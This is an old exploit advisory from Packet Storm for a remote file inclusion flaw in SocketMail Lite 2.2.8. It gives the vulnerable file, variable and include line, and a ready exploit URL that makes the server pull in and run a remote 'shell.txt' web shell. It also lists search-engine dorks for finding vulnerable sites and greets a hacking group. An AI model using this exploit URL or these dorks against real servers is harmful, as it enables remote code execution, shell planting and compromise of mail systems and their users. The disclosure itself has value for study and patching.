socketmail-rfi.txt

2007-10-22T00:00:00
ID PACKETSTORM:60275
Type packetstorm
Reporter BiNgZa
Modified 2007-10-22T00:00:00

Description

                                        
                                            `Vulnerability Type: Remote File Inclusion  
Vulnerable file: /mail/content/fnc-readmail3.php  
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?  
Method: get  
Register_globals: On  
Vulnerable variable: __SOCKETMAIL_ROOT  
Line number: 399  
Lines:  
  
----------------------------------------------  
} else {  
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");  
}  
  
----------------------------------------------  
  
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke  
  
BiG sHoUt OuT tO udplink.net  
  
FoUnD By BiNgZa  
  
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"  
  
DORK2: "Powered by SocketMail"  
  
shadowcrew@hotmail.co.uk  
  
shadow.php0h.com  
`